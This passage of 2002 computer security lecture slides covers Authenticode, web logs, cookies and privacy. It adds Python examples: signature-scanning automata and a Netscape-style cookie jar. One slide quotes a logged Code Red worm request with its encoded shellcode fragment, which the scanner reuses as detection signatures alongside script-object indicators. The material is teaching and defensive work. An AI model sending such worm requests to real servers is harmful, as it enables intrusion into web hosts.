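        self.out[state].append(name)

    def _link(self):
        """Breadth-first failure links; a shorter signature that is a suffix of a
        longer one is inherited through the output list (e.g. 'Shell' in 'WScript.Shell')."""
        queue = deque(self.goto[0].values())    # depth-1 states fail to the root
        while queue:
            r = queue.popleft()
            for b, s in self.goto[r].items():
                queue.append(s)
                f = self.fail[r]
                while f and b not in self.goto[f]:
                    f = self.fail[f]
                self.fail[s] = self.goto[f].get(b, 0)
                self.out[s] = self.out[s] + self.out[self.fail[s]]

    def scan(self, data):
        """Return [(start_offset, signature_name), ...] for every hit, in order."""
        hits, state = [], 0
        for i, b in enumerate(data):
            while state and b not in self.goto[state]:
                state = self.fail[state]
            state = self.goto[state].get(b, 0)
            for name in self.out[state]:
                hits.append((i + 1 - self.length[name], name))
        return hits

SIGNATURES = {                                   # constructed indicator strings
    "fso-object": b"Scripting.FileSystemObject",
    "shell-object": b"WScript.Shell",
    "shell-word": b"Shell",                      # suffix of the one above: exercises output links
}
SAMPLE_FILE = (b'Set fso = CreateObject("Scripting.FileSystemObject")\n'
               b'Set wscr = CreateObject("WScript.Shell")\n')   # constructed file contents

def scan_file(data=SAMPLE_FILE, signatures=SIGNATURES):
    return SignatureAutomaton(signatures).scan(data)
```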

Lecture 5, 20-771: Computer Security, Fall 2002 40

Authenticode System

• Windows 2000
• Running code requires an X.509v3 Certificate with an approved CA
• Personal Publishers (ID with Credit Bureau)
• Commercial Publishers (Articles of Incorporation)
• Sign a pledge: “reasonable care consistent with prevailing industry standards to keep code free from viruses, malicious code, and other data that may damage, misappropriate, or otherwise interfere with a third party’s operations.”
• Remedy: Revoke your Certificate (HA!)

Lecture 5, 20-771: Computer Security, Fall 2002 41

Steps you can Take

• Don’t run as administrator/root

• Use Virus Checkers (but watch those companies!!!)

• Backup Often

• Verify the integrity and authenticity of software.

– A very good idea is to not accept active code without a certificate that guarantees the author can be found!

– Same principle as “mutually assured destruction” or “keep the pilot on the plane!” He won’t hurt you if you can hurt him.

Lecture 5, 20-771: Computer Security, Fall 2002 42

Record of URLs you’ve visited

• Browser History file, document cache, and cookies

– Unix: spools or /var/adm; Windows: /winnt, /windows, program files/netscape, etc.

– Mobile code can read these.

• Your organization’s firewall or proxy server (most have logging capability)

• Your ISP’s firewall, router, or proxy server.

• Each of the remote servers you’ve visited.

Lecture 5, 20-771: Computer Security, Fall 2002 43

Web Server

• Standard Logs

– HTTP header information

» Date, From, URI, Referrer, Response Status to Request

» Also from HTTPS! (The Server Knows!)

– Logs are essential to security

• Fancier Logs

– HTTP

» What’s in the forms

» What’s in the responses

• Really fancy

– Dynamically changing information based on where you’ve been.

– Tracking across web servers.

Lecture 5, 20-771: Computer Security, Fall 2002 44

Code Red Log

12.27.8.161 - - [09/Sep/2001:04:07:07 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278

Lecture 5, 20-771: Computer Security, Fall 2002 45

Code Red I and II
http://www.eeye.com/html/Research/Advisories/AL20010804.html

%U9090 %u6858 %ucbd3 %u7801 %u9090 %u6858 %ucbd3 %u7801 %u9090 %u6858 %ucbd3 %u7801 %u9090 %u9090 %u8190 %u00c3 %u0003 %u8b00 %u531b %u53ff %u0078 %u0000 %u00=

%u9090 %u6858 %ucbd3 %u7801 %u9090 %u6858 %ucbd3 %u7801 %u9090 %u6858 %ucbd3 %u7801 %u9090 %u9090 %u8190 %u00c3 %u0003 %u8b00 %u531b %u53ff %u0078 %u0000 %u00
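The “Virus Checkers” slide says scanners compile their fingerprints into finite state automata for one fast pass over the data. The following added example (not from the lecture) builds such an automaton (Aho-Corasick) from two constructed signatures cut from the Code Red request in the log above and scans request lines with it; the signature names and the sample requests are constructed for illustration.

```python
from collections import deque

class SignatureScanner:
    """Aho-Corasick automaton: every signature is matched in one pass."""
    def __init__(self, signatures):
        self.goto, self.out, self.fail = [{}], [[]], [0]   # one entry per state
        for name, pattern in signatures.items():          # build the trie
            s = 0
            for b in pattern:
                if b not in self.goto[s]:
                    self.goto.append({}); self.out.append([]); self.fail.append(0)
                    self.goto[s][b] = len(self.goto) - 1
                s = self.goto[s][b]
            self.out[s].append(name)
        q = deque(self.goto[0].values())   # failure links, computed in BFS order
        while q:
            r = q.popleft()
            for b, s in self.goto[r].items():
                q.append(s)
                f = self.fail[r]
                while f and b not in self.goto[f]:
                    f = self.fail[f]
                self.fail[s] = self.goto[f].get(b, 0)
                self.out[s] = self.out[s] + self.out[self.fail[s]]

    def scan(self, data):
        """Return {signature_name: [end offsets]} for all matches in data (bytes)."""
        hits, s = {}, 0
        for i, b in enumerate(data):
            while s and b not in self.goto[s]:
                s = self.fail[s]
            s = self.goto[s].get(b, 0)
            for name in self.out[s]:
                hits.setdefault(name, []).append(i)
        return hits

# Constructed signatures cut from the Code Red request shown in the log above.
SIGNATURES = {
    "CodeRed.ida_probe": b"/default.ida?",
    "CodeRed.unicode_sled": b"%u9090%u6858%ucbd3%u7801",
}
SCANNER = SignatureScanner(SIGNATURES)
# Constructed sample request lines: the Code Red request (X filler shortened) and a benign one.
CODE_RED_REQUEST = (b"GET /default.ida?" + b"X" * 40
    + b"%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    + b"%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0")
BENIGN_REQUEST = b"GET /index.html HTTP/1.0"

def classify(request):
    """Sorted names of the signatures that fire on one request line."""
    return sorted(SCANNER.scan(request))
```

The same automaton answers for every signature in one pass, which is why a large signature set costs about the same scan time as a small one; a worm whose bytes are not in the set, as the slide notes, passes straight through.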

Lecture 5, 20-771: Computer Security, Fall 2002 46

Cookies (netscape cookie file)

URL-Invoking-It domain? Path in Server https? Expiration Name = value

www.airtime.co.uk FALSE /users/wysywig/ FALSE 968081837 username aaa
www.kbb.com FALSE /kb/ki.dll FALSE 9519638334 zipcode 15638
www.jcpenney.com FALSE /jcp FALSE 126632340 ShopperManager%6Fjcp SHOPPERMANAGER%6FJCP=6EJSN34316NP100L1RURQ8HHF8MX34
www.buy.com FALSE /bc FALSE 128333061 ShopperManager%6F SHOPPERMANAGER%6F=VQ8VSKLCWHSN000CM9C9JS7EDVL1
.doubleclick.net TRUE / FALSE 196034991340 id 39609560
.lycos.com TRUE / FALSE 161735952 CyberTargetAnonymous LYC000AFBAE77275BF6D2734BFCF563A16
.cmgi.com TRUE / FALSE 16173595634 CyberGlobalAnonymous CTG00017D567763405BF1FB34F8BFCD8B1D33
.webcrawler.com TRUE / FALSE 9342341600 registered no
.webcrawler.com TRUE / FALSE 9342341600 UID 210076B35C89A5C
.microsoft.com TRUE / FALSE 1065303482 MC1 GUID=DF160779710D118B1808006BB734F3F
.washingtonpost.com TRUE / FALSE 9342951343 RMID 98c81c8d3606d690
www.americanbible.org FALSE / FALSE 16308113498 Int 343 346 38 3 343 38 30 3 334 68 5 3
www.americanbible.org FALSE / FALSE 1630811600 User Profile F633C7686DA1FDBE85880034CDB11

Lecture 5, 20-771: Computer Security, Fall 2002 47

Cookies (netscape cookie file)

URL-Invoking-It domain? Path in Server https? Expiration Name = value

www.antiquebooks.net FALSE / FALSE 938368777 ulantique 7-1-6-win-ns
classics.mit.edu FALSE / FALSE 934285095 ICA_last_work Homer.iliad
.jcpenny.com TRUE / FALSE 60516333438 SITESERVER ID=69bcf8f963456b19fffdf1ff19f
.amazon.com TRUE / FALSE 6086797993 ubid-main 06-6073435981034
nonprofit.guidestar.org FALSE / FALSE 613723673 CFID 95690
.google.com TRUE / FALSE 6134736834347 ID 34816dff31190ff80
.cmu.edu TRUE / FALSE 6051263400 SITESERVER ID=f8185834df6bac5f80a793a534c18
.waterhouse.com TRUE / FALSE 963585098 accountno 35869873
tracking.carprices.com FALSE / FALSE 9634234581 PARTNER CARPRICES
tracking.carprices.com FALSE / FALSE 9634234581 MEMB_ID -1
tracking.carprices.com FALSE / FALSE 9634234581 USER 10.8.1.35-1
tracking.carprices.com FALSE / FALSE 9634234578 RETURN VISITOR

Lecture 5, 20-771: Computer Security, Fall 2002 48

Cookies : Server Writes to Browser

Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure

NAME=VALUE

expires=DATE

domain=DOMAIN_NAME The default value of domain is the host name of the server which generated the cookie response.

path=PATH The path attribute is used to specify the subset of URLs in a domain for which the cookie is valid.

secure If a cookie is marked secure, it will only be transmitted if the communications channel with the host is a secure one. Currently this means that secure cookies will only be sent to HTTPS (HTTP over SSL) servers. If secure is not specified, a cookie is considered safe to be sent in the clear over unsecured channels.

Lecture 5, 20-771: Computer Security, Fall 2002 49

Browser Volunteers Cookie to Server!

• If Browser visits the URL again, it volunteers cookie name and contents to the URL

• Cookie: NAME1=OPAQUE_STRING1; NAME2=OPAQUE_STRING2 ...

• Server Database can contain

– Cookie Name

– Opaque String

– Who (what IP/Host/User/etc) reported it

– When

Lecture 5, 20-771: Computer Security, Fall 2002 50

Cookie Source Code
www.mozilla.org

host \t isDomain \t path \t xxx \t expires \t name \t cookie (from http://lxr.mozilla.org/seamonkey/source/extensions/cookie/nsCookie.cpp#2078)

JavaScript Interface! (Red = read only)

Name (Type): Description

path (string): path the cookie applies to
domain (string): domain the cookie applies to
name (string): name of the cookie
value (string): value of the cookie
expires (string): date the cookie expires
url (string): url setting the cookie. TROJAN HORSE OPPORTUNITY!
isSecure (boolean): the cookie is sent over secure connections only
isDomain (boolean): the cookie has a domain attribute
prompt (boolean): user has configured prefs to throw cookie confirm dialog
preference (int): the user's cookie acceptance value

accept() method: allows the cookie to be set
reject() method: causes the cookie not to be set
ask() method: prompts a netlib confirmation dialog (happens during netlib set cookie execution)
confirm() method: prompts a javascript confirmation dialog (happens during javascript function execution)

Lecture 5, 20-771: Computer Security, Fall 2002 51

Cookies - Notes

• Multiple Set-Cookie headers in a single server response.

• Same path but different names will add additional mappings.

• A higher-level path value does not override more specific path mappings.

• The Expires header lets the client purge the mapping, but is not required.

• Number of cookies that a client can store at any one time:

– 300 total cookies

– 4 kilobytes per cookie

– 20 cookies per server domain.

• A CGI script deletes a cookie by returning the same cookie with an expired time.

– This requirement makes it difficult for anyone but the originator of a cookie to delete a cookie.

• The Set-Cookie response header should never be cached.

• If a proxy server receives a response containing Set-Cookie, it should propagate the Set-Cookie header to the client, regardless of whether the response was 304 (Not Modified) or 200 (OK).

• Similarly, if a client request contains a Cookie: header, it should be forwarded through a proxy, even if the conditional If-modified-since request is being made.
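Slides 48, 49 and 51 above give the Netscape cookie rules: the Set-Cookie attributes and their defaults, the browser volunteering every matching cookie back, the 300 / 20 per domain / 4 KB limits, and deletion by returning the same cookie already expired. The following added example (not from the lecture and not Netscape’s own code) is a small cookie jar that implements those rules; the expiry date format, the oldest-first eviction, and the sample hosts and cookie values are assumptions made for the illustration.

```python
import calendar, time
MAX_TOTAL, MAX_PER_DOMAIN, MAX_BYTES = 300, 20, 4096   # limits quoted on the slide

def parse_set_cookie(header, request_host, request_path):
    """Parse one Netscape-style Set-Cookie header into a dict."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    # defaults: domain is the responding host, path is the document's path
    cookie = {"name": name, "value": value, "domain": request_host,
              "path": request_path, "secure": False, "expires": None}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.lower()
        if key == "secure":
            cookie["secure"] = True
        elif key == "expires":  # assumed Netscape date form: Wdy, DD-Mon-YYYY HH:MM:SS GMT
            cookie["expires"] = calendar.timegm(time.strptime(val, "%a, %d-%b-%Y %H:%M:%S GMT"))
        elif key in ("path", "domain"):
            cookie[key] = val
    return cookie

def domain_match(host, domain):
    # Netscape tail match: the host itself, or any host inside the domain
    return host == domain or host.endswith(domain if domain.startswith(".") else "." + domain)

class CookieJar:
    def __init__(self):
        self.store = {}   # (domain, path, name) -> cookie; dict order = oldest first

    def set_cookie(self, header, request_host, request_path, now):
        c = parse_set_cookie(header, request_host, request_path)
        if len(c["name"]) + len(c["value"]) > MAX_BYTES:
            return False
        key = (c["domain"], c["path"], c["name"])
        if c["expires"] is not None and c["expires"] <= now:
            return self.store.pop(key, None) is not None   # expired cookie deletes the mapping
        if key not in self.store:   # new mapping: evict the oldest when a limit is reached
            same = [k for k in self.store if k[0] == c["domain"]]
            if len(same) >= MAX_PER_DOMAIN:
                del self.store[same[0]]
            elif len(self.store) >= MAX_TOTAL:
                del self.store[next(iter(self.store))]
        self.store[key] = c
        return True

    def cookie_header(self, host, path, https, now):
        """The Cookie: header the browser would volunteer for this URL, or None."""
        sel = [c for c in self.store.values()
               if domain_match(host, c["domain"]) and path.startswith(c["path"])
               and (https or not c["secure"]) and (c["expires"] is None or c["expires"] > now)]
        sel.sort(key=lambda c: -len(c["path"]))   # most specific path first
        return "; ".join(f'{c["name"]}={c["value"]}' for c in sel) or None
```

Note that only a response from a matching domain and path can produce the key that deletes a mapping, which is the “difficult for anyone but the originator” property from the slide; a cookie without the secure flag goes out in the clear on the very next plain HTTP request.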

Lecture 5, 20-771: Computer Security, Fall 2002 52

Two Sides

• Buyer wants things without exposing any information he discloses to any use other than what they MUST have to give him the things he wants. (Cryptophilia)

• Seller wants to know as much about Buyer as possible because this gives him control over Buyers and therefore revenue. He can also sell this information (e.g., to advertisers). He wants unrestricted use of this information.

• BUT, Buyers now collect information on Sellers and misuse that (The Sky is Falling.)

• An Agreement is bilateral. The Internet can make possible agreements public and thereby expose both Sellers and Buyers to violations.